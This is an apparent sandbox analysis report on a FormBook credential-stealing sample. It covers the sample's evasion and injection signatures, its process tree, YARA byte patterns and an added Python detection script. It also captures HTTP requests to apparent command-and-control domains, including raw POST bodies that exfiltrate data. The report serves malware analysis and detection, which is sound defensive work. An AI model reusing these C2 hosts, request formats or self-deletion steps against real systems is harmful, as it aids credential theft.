Analysis Report eN4poRmfGg.exe

Overview

General Information

Sample Name: eN4poRmfGg.exe
Analysis ID: 287698
MD5: 1d9d946599bbe47314f6dfa89f1c6e77
SHA1: 7bbdeb9670c8dc3a4f529b41b88cdd0900acad00
SHA256: 15af9bb36b7a51efea7ab70d98a29ef7059f4f5b7178fef0aaff0671bf6c9386
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Startup

  • System is w10x64
  • eN4poRmfGg.exe (PID: 7000 cmdline: 'C:\Users\user\Desktop\eN4poRmfGg.exe' MD5: 1D9D946599BBE47314F6DFA89F1C6E77)
    • eN4poRmfGg.exe (PID: 7020 cmdline: 'C:\Users\user\Desktop\eN4poRmfGg.exe' MD5: 1D9D946599BBE47314F6DFA89F1C6E77)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6560 cmdline: /c del 'C:\Users\user\Desktop\eN4poRmfGg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • nb4dzn5jg.exe (PID: 1308 cmdline: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe MD5: 1D9D946599BBE47314F6DFA89F1C6E77)
          • nb4dzn5jg.exe (PID: 5356 cmdline: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe MD5: 1D9D946599BBE47314F6DFA89F1C6E77)
        • colorcpl.exe (PID: 1244 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(40 further memory-dump entries not shown)

Unpacked PEs

Source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x17539:$sqlite3step: 68 34 1C 7B E1
    • 0x1764c:$sqlite3step: 68 34 1C 7B E1
    • 0x17568:$sqlite3text: 68 38 2A 90 C5
    • 0x1768d:$sqlite3text: 68 38 2A 90 C5
    • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
Source: 27.1.nb4dzn5jg.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(43 further unpacked-PE entries not shown)

          Sigma Overview

          System Summary:

Sigma detected: Suspicious Svchost Process
  Source: Process started | Author: Florian Roth
  Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3376, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7060
Sigma detected: Windows Processes Suspicious Parent Directory
  Source: Process started | Author: vburov
  Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3376, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7060
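Both Sigma hits fire on the same event: a 32-bit svchost.exe (PID 7060) started by explorer.exe rather than by services.exe, which is the visible trace of the injection chain in the Startup tree (sample -> hollowed child -> explorer.exe -> svchost.exe -> cmd.exe /c del <sample>). The following is an added example, not part of the Joe Sandbox report and not the Sigma rules themselves: it replays that chain as constructed Sysmon-style process-creation events and applies three checks, an approximation of the svchost parent allow-list, a simplified "parent outside System32/SysWOW64" check for core Windows binaries, and a check for cmd.exe deleting a binary that executed in the same session (the self-deletion seen in the tree). The cmd.exe image path, the parent of PID 7000, the allow-list contents and the two benign control events are assumptions.

```python
"""Process-creation triage for the injection chain shown in this report.

Added example; the allow-lists approximate the public Sigma rules named above
and are not copies of them.
"""
import ntpath
import re

# Parents from which svchost.exe is normally launched (assumed approximation of
# the "Suspicious Svchost Process" rule's allow-list).
SVCHOST_PARENT_ALLOWLIST = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}

# Core Windows binaries whose parent is expected to live in a system directory
# (simplified version of the "Windows Processes Suspicious Parent Directory" idea).
CORE_WINDOWS_BINARIES = {"svchost.exe", "taskhost.exe", "taskhostw.exe", "lsass.exe",
                         "csrss.exe", "wininit.exe", "winlogon.exe", "services.exe"}
EXPECTED_PARENT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# "del <path>" with optional switches, single or double quotes.
DEL_RE = re.compile(r"""\bdel\s+(?:/\w\s+)*["']?(?P<target>[^"']+?)["']?\s*$""", re.IGNORECASE)

# Constructed events mirroring the Startup tree (Sysmon Event ID 1 field names).
# PIDs and images come from the tree; the cmd.exe image path, the parent of
# PID 7000 and the two benign control events at the end are assumptions.
EVENTS = [
    {"ProcessId": 7000, "ParentProcessId": 3376, "Image": r"C:\Users\user\Desktop\eN4poRmfGg.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"C:\Users\user\Desktop\eN4poRmfGg.exe"},
    {"ProcessId": 7020, "ParentProcessId": 7000, "Image": r"C:\Users\user\Desktop\eN4poRmfGg.exe",
     "ParentImage": r"C:\Users\user\Desktop\eN4poRmfGg.exe", "CommandLine": r"C:\Users\user\Desktop\eN4poRmfGg.exe"},
    {"ProcessId": 7060, "ParentProcessId": 3376, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"C:\Windows\SysWOW64\svchost.exe"},
    {"ProcessId": 6560, "ParentProcessId": 7060, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\svchost.exe", "CommandLine": r"/c del 'C:\Users\user\Desktop\eN4poRmfGg.exe'"},
    {"ProcessId": 1308, "ParentProcessId": 3376, "Image": r"C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe"},
    # Benign control cases (constructed): a normal service host and an unrelated del.
    {"ProcessId": 900, "ParentProcessId": 700, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"ProcessId": 4100, "ParentProcessId": 3376, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"cmd.exe /c del C:\Users\user\Desktop\notes.txt"},
]


def _base(path):
    return ntpath.basename(path or "").lower()


def _dir(path):
    return ntpath.dirname(path or "").lower()


def svchost_unexpected_parent(events):
    """PIDs of svchost.exe instances whose parent is not a normal service-host launcher."""
    return [e["ProcessId"] for e in events
            if _base(e["Image"]) == "svchost.exe"
            and _base(e["ParentImage"]) not in SVCHOST_PARENT_ALLOWLIST]


def core_binary_parent_outside_system_dirs(events):
    """PIDs of core Windows binaries whose parent image lives outside System32/SysWOW64."""
    return [e["ProcessId"] for e in events
            if _base(e["Image"]) in CORE_WINDOWS_BINARIES
            and _dir(e["ParentImage"]) not in EXPECTED_PARENT_DIRS]


def deletes_executed_binary(events):
    """(PID, target) for cmd.exe 'del' commands whose target ran as a process in the same session."""
    executed = {e["Image"].lower() for e in events}
    hits = []
    for e in events:
        if _base(e["Image"]) != "cmd.exe":
            continue
        m = DEL_RE.search(e["CommandLine"])
        if m and m.group("target").lower() in executed:
            hits.append((e["ProcessId"], m.group("target")))
    return hits


def triage(events):
    """All findings as (rule name, PID) tuples."""
    findings = [("svchost_unexpected_parent", pid) for pid in svchost_unexpected_parent(events)]
    findings += [("core_binary_suspicious_parent_dir", pid) for pid in core_binary_parent_outside_system_dirs(events)]
    findings += [("deletes_executed_binary", pid) for pid, _ in deletes_executed_binary(events)]
    return findings


if __name__ == "__main__":
    for rule, pid in triage(EVENTS):
        print(f"{rule}: PID {pid}")
```

On the constructed events only PID 7060 (svchost.exe under explorer.exe) and PID 6560 (cmd.exe deleting the sample) are reported; the service-host started by services.exe and the unrelated `del` are not. The third check is the one that survives when the first two are tuned away: a shell deleting a binary that has already run in the session is rarely legitimate and is exactly the cleanup step shown in the tree.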

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
  Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe | Virustotal: Detection: 42%
  Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe | ReversingLabs: Detection: 45%
  Source: C:\Users\user\AppData\Local\Temp\Dbnudz\nb4dzn5jg.exe | Virustotal: Detection: 42%
  Source: C:\Users\user\AppData\Local\Temp\Dbnudz\nb4dzn5jg.exe | ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
  Source: eN4poRmfGg.exe | Virustotal: Detection: 42%
  Source: eN4poRmfGg.exe | ReversingLabs: Detection: 45%
Yara detected FormBook
  Source: Yara match | File source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
  Source: Yara match | File source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000003.00000002.465450197.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 0000001B.00000002.443381775.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 0000001C.00000002.444527308.0000000003050000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000000.00000002.198128897.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 0000001B.00000002.442039105.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 0000001B.00000002.441710972.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000001.00000001.197591617.0000000000400000.00000040.00020000.sdmp, type: MEMORY
  Source: Yara match | File source: 00000000.00000002.199282148.0000000004180000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000001.00000002.227981004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000001.00000002.229698791.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000003.00000002.464383843.0000000000600000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 00000001.00000002.233460768.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 0000001A.00000002.432464043.00000000028D0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 27.1.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 0.2.eN4poRmfGg.exe.4180000.3.raw.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 1.1.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 26.2.nb4dzn5jg.exe.4290000.3.raw.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 26.2.nb4dzn5jg.exe.28d0000.2.raw.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 0.2.eN4poRmfGg.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 27.2.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 27.2.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 0.2.eN4poRmfGg.exe.4180000.3.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 27.1.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 1.2.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 1.1.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 26.2.nb4dzn5jg.exe.4290000.3.unpack, type: UNPACKEDPE
  Source: Yara match | File source: 1.2.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
  Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
  Source: eN4poRmfGg.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
  Source: 27.1.nb4dzn5jg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 1.1.eN4poRmfGg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 3.2.svchost.exe.2d00000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
  Source: 27.2.nb4dzn5jg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 0.2.eN4poRmfGg.exe.4180000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 26.2.nb4dzn5jg.exe.4290000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 1.2.eN4poRmfGg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

  Source: C:\Users\user\Desktop\eN4poRmfGg.exe | Code function: 0_2_00405934 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405934
  Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe | Code function: 26_2_00405934 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,26_2_00405934

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49742
  Source: global traffic | HTTP traffic detected: GET /3nk4/?RZBd8HzP=bIh+1viU3kJZwlU1+bF7NiTuEsJvwz9W2axQZvl/sJKd/5qF7f1dSILuagTiNZjEdxJz&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1 | Host: www.trulex.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
  Source: global traffic | HTTP traffic detected: GET /3nk4/?RZBd8HzP=w0UEi+V/ezucUh8SDyYF/+zgRqcIqbOC7nP1ZKE/fBP38eRJlYPULz8xC7zNwysHBq0j&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1 | Host: www.reignsponsibly.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
  Source: global traffic | HTTP traffic detected: GET /3nk4/?RZBd8HzP=bnGlARlxAxXJaK863FaqbUduOQZZdXfDbBghBWs+/ncmCRg0ePvqNMTvjJHXk6PE1an+&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1 | Host: www.turismoplayas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
  Source: Joe Sandbox View | IP Address: 34.102.136.180
  Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
  Source: Joe Sandbox View | ASN Name: GOOGLEUS
  Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.reignsponsibly.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.reignsponsibly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reignsponsibly.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 34 57 59 2d 38 62 5a 39 58 44 69 67 4b 68 73 54 5a 53 46 47 67 34 28 4e 58 4c 73 5f 72 6f 36 35 74 44 4f 4f 64 36 42 70 59 31 76 39 38 4e 35 59 6c 4c 4f 5f 4a 6c 74 50 65 34 28 43 6f 6a 78 75 4f 59 55 6d 43 65 69 72 45 4f 4b 51 6c 58 4c 44 6e 50 66 52 78 5f 6d 74 59 45 74 7a 70 54 51 32 54 31 4f 4d 63 50 6e 72 6c 33 52 44 69 42 45 79 52 77 69 6e 58 68 4d 4b 32 7a 72 43 68 71 30 4c 63 46 4b 74 31 5f 75 4b 36 68 33 49 74 35 6a 64 47 4b 56 71 51 52 78 4b 39 6c 75 42 78 46 74 31 7a 54 59 33 68 36 4b 6a 5a 55 73 73 64 30 37 43 64 73 31 42 7a 79 6f 55 46 34 5a 38 48 50 79 56 6a 49 4e 35 75 43 65 78 54 48 66 6c 44 2d 6d 56 7a 47 28 59 32 64 36 75 31 41 5a 65 4d 64 6a 64 68 41 37 58 32 57 6a 51 7a 4c 4f 35 64 48 69 52 62 35 39 51 49 4c 71 6e 5a 57 79 75 35 4d 72 39 77 57 6c 49 35 4e 38 6a 58 66 47 58 42 69 53 70 4d 65 64 51 42 4a 6d 4c 74 30 58 67 5a 39 35 79 6b 4f 47 71 65 59 52 77 63 4f 57 79 6a 39 59 6e 64 35 57 4f 49 6e 7e 69 4c 47 75 49 31 4a 6a 32 38 5a 62 39 49 43 35 41 69 57 37 5f 46 75 7a 59 6f 4b 65 38 73 36 54 33 69 36 64 58 57 4b 57 4c 79 73 64 53 57 39 41 78 39 64 7a 76 63 46 59 54 51 75 4a 50 4c 5f 62 44 47 58 30 79 4b 6c 49 61 62 4c 5a 65 77 50 4e 69 4b 31 36 5f 31 4c 39 31 55 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
RZBd8HzP=4WY-8bZ9XDigKhsTZSFGg4(NXLs_ro65tDOOd6BpY1v98N5YlLO_JltPe4(CojxuOYUmCeirEOKQlXLDnPfRx_mtYEtzpTQ2T1OMcPnrl3RDiBEyRwinXhMK2zrChq0LcFKt1_uK6h3It5jdGKVqQRxK9luBxFt1zTY3h6KjZUssd07Cds1BzyoUF4Z8HPyVjIN5uCexTHflD-mVzG(Y2d6u1AZeMdjdhA7X2WjQzLO5dHiRb59QILqnZWyu5Mr9wWlI5N8jXfGXBiSpMedQBJmLt0XgZ95ykOGqeYRwcOWyj9Ynd5WOIn~iLGuI1Jj28Zb9IC5AiW7_FuzYoKe8s6T3i6dXWKWLysdSW9Ax9dzvcFYTQuJPL_bDGX0yKlIabLZewPNiK16_1L91Ug).
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.reignsponsibly.comConnection: closeContent-Length: 184586Cache-Control: no-cacheOrigin: http://www.reignsponsibly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reignsponsibly.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 34 57 59 2d 38 61 67 4d 62 54 32 39 4f 54 4a 30 57 6d 68 65 72 59 50 66 46 35 6f 6f 36 5f 65 4c 67 78 61 6b 64 37 52 6c 52 51 66 76 74 64 70 59 6e 4e 61 6b 45 6c 74 4d 59 34 28 42 73 6a 38 62 4f 49 73 75 43 61 37 6a 45 50 65 54 73 78 76 47 6e 66 65 4c 33 61 7e 52 4e 55 35 6f 70 52 31 57 64 32 69 55 5a 50 72 72 75 58 5a 42 73 42 34 58 51 79 47 69 65 78 41 50 77 78 62 62 68 64 45 7a 63 6e 32 44 38 65 69 49 78 77 44 44 70 4d 72 78 43 5a 31 35 61 67 41 43 79 43 7e 65 7e 47 35 78 32 57 73 56 6c 4c 4b 73 47 31 45 71 4b 33 6a 77 57 39 78 34 78 6a 59 41 46 36 35 73 4f 64 6d 45 79 5f 74 78 73 78 4b 50 4c 47 62 6e 50 74 7e 64 69 51 72 50 30 63 4c 4d 36 68 70 56 4a 4f 32 46 67 44 44 48 70 48 37 72 78 5f 65 50 57 56 36 35 62 6f 35 6d 48 71 62 46 44 6c 69 39 72 59 6d 79 38 31 49 30 32 4e 38 41 48 76 48 59 4b 79 53 64 4b 2d 5a 6c 42 36 28 45 74 31 50 79 41 5a 4e 33 6a 4e 69 71 61 35 68 4c 50 4f 47 2d 72 73 70 51 5a 2d 32 7a 48 41 32 76 4d 47 76 56 31 4e 62 74 38 5a 62 58 49 44 35 6d 68 48 66 5f 45 38 71 45 6f 70 32 67 34 4b 54 75 67 71 4e 4a 66 5a 53 62 79 73 56 53 58 4d 78 6b 39 73 72 76 4b 41 63 51 52 50 4a 50 49 50 62 44 4b 33 31 75 43 31 31 73 57 35 52 54 34 39 63 50 4e 51 48 66 36 61 49 66 4b 6f 4f 6e 76 42 46 77 76 34 35 45 4c 5a 54 39 4e 49 58 78 39 47 38 31 7a 2d 75 33 43 38 48 49 45 53 37 54 4e 67 72 69 4b 45 54 69 6a 71 41 2d 58 52 72 36 54 33 74 39 34 47 67 42 32 67 4c 5f 73 66 6d 6d 30 76 32 45 39 69 59 54 53 68 67 61 6a 73 39 67 51 75 70 34 48 46 4a 35 58 44 6c 68 6e 37 50 43 73 4c 67 69 7a 70 48 
